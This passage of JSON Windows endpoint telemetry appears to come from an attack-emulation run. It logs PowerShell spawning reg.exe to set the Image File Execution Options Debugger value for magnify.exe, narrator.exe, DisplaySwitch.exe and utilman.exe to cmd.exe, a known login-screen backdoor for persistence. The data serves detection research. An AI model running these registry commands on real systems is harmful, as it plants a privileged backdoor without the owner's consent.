"image_load", - "image_name": "rpcrt4.dll", - "image_path": "C:\\Windows\\System32\\rpcrt4.dll", - "pid": 3444, - "process_name": "reg.exe", - "process_path": "C:\\Windows\\System32\\reg.exe", - "timestamp": 131883571826360000, - "unique_pid": "{42FC7E13-CB3E-5C05-0000-0010BB315101}" - }, - { - "event_type": "image_load", - "image_name": "ws2_32.dll", - "image_path": "C:\\Windows\\System32\\ws2_32.dll", - "pid": 3444, - "process_name": "reg.exe", - "process_path": "C:\\Windows\\System32\\reg.exe", - "timestamp": 131883571826360000, - "unique_pid": "{42FC7E13-CB3E-5C05-0000-0010BB315101}" - }, - { - "event_type": "registry", - "pid": 3444, - "process_name": "reg.exe", - "process_path": "C:\\WINDOWS\\system32\\reg.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\utilman.exe", - "registry_value": "utilman.exe", - "timestamp": 131883571826360000, - "unique_pid": "{42FC7E13-CB3E-5C05-0000-0010BB315101}" - }, - { - "event_type": "registry", - "pid": 3444, - "process_name": "reg.exe", - "process_path": "C:\\WINDOWS\\system32\\reg.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\utilman.exe", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\utilman.exe\\Debugger", - "registry_value": "Debugger", - "timestamp": 131883571826360000, - "unique_pid": "{42FC7E13-CB3E-5C05-0000-0010BB315101}" - }, - { - "event_type": "process", - "pid": 3444, - "process_name": "reg.exe", - "process_path": "C:\\Windows\\System32\\reg.exe", - "subtype": "terminate", - "timestamp": 131883571826360000, - "unique_pid": "{42FC7E13-CB3E-5C05-0000-0010BB315101}" - }, - { - "event_type": "process", - "pid": 7448, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "subtype": "terminate", - "timestamp": 131883571826360000, - "unique_pid": "{42FC7E13-CB3E-5C05-0000-0010C8305101}" - }, - { - "command_line": "\"C:\\WINDOWS\\system32\\cmd.exe\" /c ", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "powershell.exe", - "parent_process_path": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", - "pid": 6748, - "ppid": 7036, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "subtype": "create", - "timestamp": 131883571826509984, - "unique_pid": "{42FC7E13-CB3E-5C05-0000-00101A335101}", - "unique_ppid": "{42FC7E13-C11D-5C05-0000-0010C6E90401}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "cmd.exe", - "image_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 6748, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883571826520000, - "unique_pid": "{42FC7E13-CB3E-5C05-0000-00101A335101}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 6748, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883571826520000, - "unique_pid": "{42FC7E13-CB3E-5C05-0000-00101A335101}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 6748, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883571826520000, - "unique_pid": "{42FC7E13-CB3E-5C05-0000-00101A335101}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 6748, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883571826520000, - "unique_pid": "{42FC7E13-CB3E-5C05-0000-00101A335101}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 6748, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883571826520000, - "unique_pid": "{42FC7E13-CB3E-5C05-0000-00101A335101}" - }, - { - "event_type": "process", - "pid": 6748, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "subtype": "terminate", - "timestamp": 131883571826520000, - "unique_pid": "{42FC7E13-CB3E-5C05-0000-00101A335101}" - }, - { - "command_line": "\"C:\\WINDOWS\\system32\\cmd.exe\" /c \"reg add \" HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution \"Options\\magnify.exe /v Debugger /t REG_SZ /d C:\\windows\\system32\\cmd.exe /f\"", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "powershell.exe", - "parent_process_path": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", - "pid": 8140, - "ppid": 7036, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "subtype": "create", - "timestamp": 131883571827110000, - "unique_pid": "{42FC7E13-CB3E-5C05-0000-00107A375101}", - "unique_ppid": "{42FC7E13-C11D-5C05-0000-0010C6E90401}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "cmd.exe", - "image_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 8140, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883571826990000, - "unique_pid": "{42FC7E13-CB3E-5C05-0000-00107A375101}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 8140, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883571826990000, - "unique_pid": "{42FC7E13-CB3E-5C05-0000-00107A375101}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 8140, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883571826990000, - "unique_pid": "{42FC7E13-CB3E-5C05-0000-00107A375101}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 8140, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883571826990000, - "unique_pid": "{42FC7E13-CB3E-5C05-0000-00107A375101}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 8140, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883571827140000, - "unique_pid": "{42FC7E13-CB3E-5C05-0000-00107A375101}" - }, - { - "command_line": "reg add \" HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution \"Options\\magnify.exe /v Debugger /t REG_SZ /d C:\\windows\\system32\\cmd.exe /f", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "cmd.exe", - "parent_process_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 7956, - "ppid": 8140, - "process_name": "reg.exe", - "process_path": "C:\\Windows\\System32\\reg.exe", - "subtype": "create", - "timestamp": 131883571827210000, - "unique_pid": "{42FC7E13-CB3E-5C05-0000-00106D385101}", - "unique_ppid": "{42FC7E13-CB3E-5C05-0000-00107A375101}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "reg.exe", - "image_path": "C:\\Windows\\System32\\reg.exe", - "pid": 7956, - "process_name": "reg.exe", - "process_path": "C:\\Windows\\System32\\reg.exe", - "timestamp": 131883571827140000, - "unique_pid": "{42FC7E13-CB3E-5C05-0000-00106D385101}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 7956, - "process_name": "reg.exe", - "process_path": "C:\\Windows\\System32\\reg.exe", - "timestamp": 131883571827140000, - "unique_pid": "{42FC7E13-CB3E-5C05-0000-00106D385101}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 7956, - "process_name": "reg.exe", - "process_path": "C:\\Windows\\System32\\reg.exe", - "timestamp": 131883571827140000, - "unique_pid": "{42FC7E13-CB3E-5C05-0000-00106D385101}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 7956, - "process_name": "reg.exe", - "process_path": "C:\\Windows\\System32\\reg.exe", - "timestamp": 131883571827140000, - "unique_pid": "{42FC7E13-CB3E-5C05-0000-00106D385101}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 7956, - "process_name": "reg.exe", - "process_path": "C:\\Windows\\System32\\reg.exe", - "timestamp": 131883571827140000, - "unique_pid": "{42FC7E13-CB3E-5C05-0000-00106D385101}" - }, - { - "event_type": "image_load", - "image_name": "advapi32.dll", - "image_path": "C:\\Windows\\System32\\advapi32.dll", - "pid": 7956, - "process_name": "reg.exe", - "process_path": "C:\\Windows\\System32\\reg.exe", - "timestamp": 131883571827140000, - "unique_pid": "{42FC7E13-CB3E-5C05-0000-00106D385101}" - }, - { - "event_type": "image_load", - "image_name": "sechost.dll", - "image_path": "C:\\Windows\\System32\\sechost.dll", - "pid": 7956, - "process_name": "reg.exe", - "process_path": "C:\\Windows\\System32\\reg.exe", - "timestamp": 131883571827140000, - "unique_pid": "{42FC7E13-CB3E-5C05-0000-00106D385101}" - }, - { - "event_type": "image_load", - "image_name": "rpcrt4.dll", - "image_path": "C:\\Windows\\System32\\rpcrt4.dll", - "pid": 7956, - "process_name": "reg.exe", - "process_path": "C:\\Windows\\System32\\reg.exe", - "timestamp": 131883571827140000, - "unique_pid": "{42FC7E13-CB3E-5C05-0000-00106D385101}" - }, - { - "event_type": "image_load", - "image_name": "ws2_32.dll", - "image_path": "C:\\Windows\\System32\\ws2_32.dll", - "pid": 7956, - "process_name": "reg.exe", - "process_path": "C:\\Windows\\System32\\reg.exe", - "timestamp": 131883571827140000, - "unique_pid": "{42FC7E13-CB3E-5C05-0000-00106D385101}" - }, - { - "event_type": "registry", - "pid": 7956, - "process_name": "reg.exe", - "process_path": "C:\\WINDOWS\\system32\\reg.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\magnify.exe", - "registry_value": "magnify.exe", - "timestamp": 131883571827140000, - "unique_pid": "{42FC7E13-CB3E-5C05-0000-00106D385101}" - }, - { - "event_type": "registry", - "pid": 7956, - "process_name": "reg.exe", - "process_path": "C:\\WINDOWS\\system32\\reg.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\magnify.exe", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\magnify.exe\\Debugger", - "registry_value": "Debugger", - "timestamp": 131883571827140000, - "unique_pid": "{42FC7E13-CB3E-5C05-0000-00106D385101}" - }, - { - "event_type": "process", - "pid": 7956, - "process_name": "reg.exe", - "process_path": "C:\\Windows\\System32\\reg.exe", - "subtype": "terminate", - "timestamp": 131883571827300000, - "unique_pid": "{42FC7E13-CB3E-5C05-0000-00106D385101}" - }, - { - "event_type": "process", - "pid": 8140, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "subtype": "terminate", - "timestamp": 131883571827300000, - "unique_pid": "{42FC7E13-CB3E-5C05-0000-00107A375101}" - }, - { - "command_line": "\"C:\\WINDOWS\\system32\\cmd.exe\" /c ", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "powershell.exe", - "parent_process_path": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", - "pid": 7012, - "ppid": 7036, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "subtype": "create", - "timestamp": 131883571827380016, - "unique_pid": "{42FC7E13-CB3E-5C05-0000-0010CC395101}", - "unique_ppid": "{42FC7E13-C11D-5C05-0000-0010C6E90401}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "cmd.exe", - "image_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 7012, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883571827300000, - "unique_pid": "{42FC7E13-CB3E-5C05-0000-0010CC395101}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 7012, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883571827300000, - "unique_pid": "{42FC7E13-CB3E-5C05-0000-0010CC395101}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 7012, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883571827300000, - "unique_pid": "{42FC7E13-CB3E-5C05-0000-0010CC395101}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 7012, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883571827300000, - "unique_pid": "{42FC7E13-CB3E-5C05-0000-0010CC395101}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 7012, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883571827300000, - "unique_pid": "{42FC7E13-CB3E-5C05-0000-0010CC395101}" - }, - { - "event_type": "process", - "pid": 7012, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "subtype": "terminate", - "timestamp": 131883571827450016, - "unique_pid": "{42FC7E13-CB3E-5C05-0000-0010CC395101}" - }, - { - "command_line": "\"C:\\WINDOWS\\system32\\cmd.exe\" /c \"reg add \" HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution \"Options\\narrator.exe /v Debugger /t REG_SZ /d C:\\windows\\system32\\cmd.exe /f\"", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "powershell.exe", - "parent_process_path": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", - "pid": 6112, - "ppid": 7036, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "subtype": "create", - "timestamp": 131883571828000000, - "unique_pid": "{42FC7E13-CB3E-5C05-0000-00102A3E5101}", - "unique_ppid": "{42FC7E13-C11D-5C05-0000-0010C6E90401}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "cmd.exe", - "image_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 6112, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883571827920000, - "unique_pid": "{42FC7E13-CB3E-5C05-0000-00102A3E5101}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 6112, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883571827920000, - "unique_pid": "{42FC7E13-CB3E-5C05-0000-00102A3E5101}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 6112, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883571827920000, - "unique_pid": "{42FC7E13-CB3E-5C05-0000-00102A3E5101}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 6112, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883571827920000, - "unique_pid": "{42FC7E13-CB3E-5C05-0000-00102A3E5101}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 6112, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883571827920000, - "unique_pid": "{42FC7E13-CB3E-5C05-0000-00102A3E5101}" - }, - { - "command_line": "reg add \" HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution \"Options\\narrator.exe /v Debugger /t REG_SZ /d C:\\windows\\system32\\cmd.exe /f", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "cmd.exe", - "parent_process_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 4532, - "ppid": 6112, - "process_name": "reg.exe", - "process_path": "C:\\Windows\\System32\\reg.exe", - "subtype": "create", - "timestamp": 131883571828080000, - "unique_pid": "{42FC7E13-CB3E-5C05-0000-00101E3F5101}", - "unique_ppid": "{42FC7E13-CB3E-5C05-0000-00102A3E5101}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "reg.exe", - "image_path": "C:\\Windows\\System32\\reg.exe", - "pid": 4532, - "process_name": "reg.exe", - "process_path": "C:\\Windows\\System32\\reg.exe", - "timestamp": 131883571828080000, - "unique_pid": "{42FC7E13-CB3E-5C05-0000-00101E3F5101}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 4532, - "process_name": "reg.exe", - "process_path": "C:\\Windows\\System32\\reg.exe", - "timestamp": 131883571828080000, - "unique_pid": "{42FC7E13-CB3E-5C05-0000-00101E3F5101}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 4532, - "process_name": "reg.exe", - "process_path": "C:\\Windows\\System32\\reg.exe", - "timestamp": 131883571828080000, - "unique_pid": "{42FC7E13-CB3E-5C05-0000-00101E3F5101}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 4532, - "process_name": "reg.exe", - "process_path": "C:\\Windows\\System32\\reg.exe", - "timestamp": 131883571828080000, - "unique_pid": "{42FC7E13-CB3E-5C05-0000-00101E3F5101}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 4532, - "process_name": "reg.exe", - "process_path": "C:\\Windows\\System32\\reg.exe", - "timestamp": 131883571828080000, - "unique_pid": "{42FC7E13-CB3E-5C05-0000-00101E3F5101}" - }, - { - "event_type": "image_load", - "image_name": "advapi32.dll", - "image_path": "C:\\Windows\\System32\\advapi32.dll", - "pid": 4532, - "process_name": "reg.exe", - "process_path": "C:\\Windows\\System32\\reg.exe", - "timestamp": 131883571828080000, - "unique_pid": "{42FC7E13-CB3E-5C05-0000-00101E3F5101}" - }, - { - "event_type": "image_load", - "image_name": "sechost.dll", - "image_path": "C:\\Windows\\System32\\sechost.dll", - "pid": 4532, - "process_name": "reg.exe", - "process_path": "C:\\Windows\\System32\\reg.exe", - "timestamp": 131883571828080000, - "unique_pid": "{42FC7E13-CB3E-5C05-0000-00101E3F5101}" - }, - { - "event_type": "image_load", - "image_name": "rpcrt4.dll", - "image_path": "C:\\Windows\\System32\\rpcrt4.dll", - "pid": 4532, - "process_name": "reg.exe", - "process_path": "C:\\Windows\\System32\\reg.exe", - "timestamp": 131883571828080000, - "unique_pid": "{42FC7E13-CB3E-5C05-0000-00101E3F5101}" - }, - { - "event_type": "image_load", - "image_name": "ws2_32.dll", - "image_path": "C:\\Windows\\System32\\ws2_32.dll", - "pid": 4532, - "process_name": "reg.exe", - "process_path": "C:\\Windows\\System32\\reg.exe", - "timestamp": 131883571828080000, - "unique_pid": "{42FC7E13-CB3E-5C05-0000-00101E3F5101}" - }, - { - "event_type": "registry", - "pid": 4532, - "process_name": "reg.exe", - "process_path": "C:\\WINDOWS\\system32\\reg.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\narrator.exe", - "registry_value": "narrator.exe", - "timestamp": 131883571828080000, - "unique_pid": "{42FC7E13-CB3E-5C05-0000-00101E3F5101}" - }, - { - "event_type": "registry", - "pid": 4532, - "process_name": "reg.exe", - "process_path": "C:\\WINDOWS\\system32\\reg.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\narrator.exe", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\narrator.exe\\Debugger", - "registry_value": "Debugger", - "timestamp": 131883571828080000, - "unique_pid": "{42FC7E13-CB3E-5C05-0000-00101E3F5101}" - }, - { - "event_type": "process", - "pid": 4532, - "process_name": "reg.exe", - "process_path": "C:\\Windows\\System32\\reg.exe", - "subtype": "terminate", - "timestamp": 131883571828080000, - "unique_pid": "{42FC7E13-CB3E-5C05-0000-00101E3F5101}" - }, - { - "event_type": "process", - "pid": 6112, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "subtype": "terminate", - "timestamp": 131883571828080000, - "unique_pid": "{42FC7E13-CB3E-5C05-0000-00102A3E5101}" - }, - { - "command_line": "\"C:\\WINDOWS\\system32\\cmd.exe\" /c ", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "powershell.exe", - "parent_process_path": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", - "pid": 5920, - "ppid": 7036, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "subtype": "create", - "timestamp": 131883571828250000, - "unique_pid": "{42FC7E13-CB3E-5C05-0000-00107D405101}", - "unique_ppid": "{42FC7E13-C11D-5C05-0000-0010C6E90401}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "cmd.exe", - "image_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 5920, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883571828240000, - "unique_pid": "{42FC7E13-CB3E-5C05-0000-00107D405101}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 5920, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883571828240000, - "unique_pid": "{42FC7E13-CB3E-5C05-0000-00107D405101}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 5920, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883571828240000, - "unique_pid": "{42FC7E13-CB3E-5C05-0000-00107D405101}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 5920, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883571828240000, - "unique_pid": "{42FC7E13-CB3E-5C05-0000-00107D405101}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 5920, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883571828240000, - "unique_pid": "{42FC7E13-CB3E-5C05-0000-00107D405101}" - }, - { - "event_type": "process", - "pid": 5920, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "subtype": "terminate", - "timestamp": 131883571828240000, - "unique_pid": "{42FC7E13-CB3E-5C05-0000-00107D405101}" - }, - { - "command_line": "\"C:\\WINDOWS\\system32\\cmd.exe\" /c \"reg add \" HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution \"Options\\DisplaySwitch.exe /v Debugger /t REG_SZ /d C:\\windows\\system32\\cmd.exe /f\"", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "powershell.exe", - "parent_process_path": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", - "pid": 4764, - "ppid": 7036, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "subtype": "create", - "timestamp": 131883571828860000, - "unique_pid": "{42FC7E13-CB3E-5C05-0000-0010DE445101}", - "unique_ppid": "{42FC7E13-C11D-5C05-0000-0010C6E90401}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "cmd.exe", - "image_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 4764, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883571828860000, - "unique_pid": "{42FC7E13-CB3E-5C05-0000-0010DE445101}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 4764, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883571828860000, - "unique_pid": "{42FC7E13-CB3E-5C05-0000-0010DE445101}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 4764, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883571828860000, - "unique_pid": "{42FC7E13-CB3E-5C05-0000-0010DE445101}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 4764, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883571828860000, - "unique_pid": "{42FC7E13-CB3E-5C05-0000-0010DE445101}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 4764, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883571828860000, - "unique_pid": "{42FC7E13-CB3E-5C05-0000-0010DE445101}" - }, - { - "command_line": "reg add \" HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution \"Options\\DisplaySwitch.exe /v Debugger /t REG_SZ /d C:\\windows\\system32\\cmd.exe /f", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "cmd.exe", - "parent_process_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 4916, - "ppid": 4764, - "process_name": "reg.exe", - "process_path": "C:\\Windows\\System32\\reg.exe", - "subtype": "create", - "timestamp": 131883571828950000, - "unique_pid": "{42FC7E13-CB3E-5C05-0000-0010D1455101}", - "unique_ppid": "{42FC7E13-CB3E-5C05-0000-0010DE445101}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "reg.exe", - "image_path": "C:\\Windows\\System32\\reg.exe", - "pid": 4916, - "process_name": "reg.exe", - "process_path": "C:\\Windows\\System32\\reg.exe", - "timestamp": 131883571828860000, - "unique_pid": "{42FC7E13-CB3E-5C05-0000-0010D1455101}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 4916, - "process_name": "reg.exe", - "process_path": "C:\\Windows\\System32\\reg.exe", - "timestamp": 131883571828860000, - "unique_pid": "{42FC7E13-CB3E-5C05-0000-0010D1455101}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 4916, - "process_name": "reg.exe", - "process_path": "C:\\Windows\\System32\\reg.exe", - "timestamp": 131883571828860000, - "unique_pid": "{42FC7E13-CB3E-5C05-0000-0010D1455101}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 4916, - "process_name": "reg.exe", - "process_path": "C:\\Windows\\System32\\reg.exe", - "timestamp": 131883571828860000, - "unique_pid": "{42FC7E13-CB3E-5C05-0000-0010D1455101}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 4916, - "process_name": "reg.exe", - "process_path": "C:\\Windows\\System32\\reg.exe", - "timestamp": 131883571828860000, - "unique_pid": "{42FC7E13-CB3E-5C05-0000-0010D1455101}" - }, - { - "event_type": "image_load", - "image_name": "advapi32.dll", - "image_path": "C:\\Windows\\System32\\advapi32.dll", - "pid": 4916, - 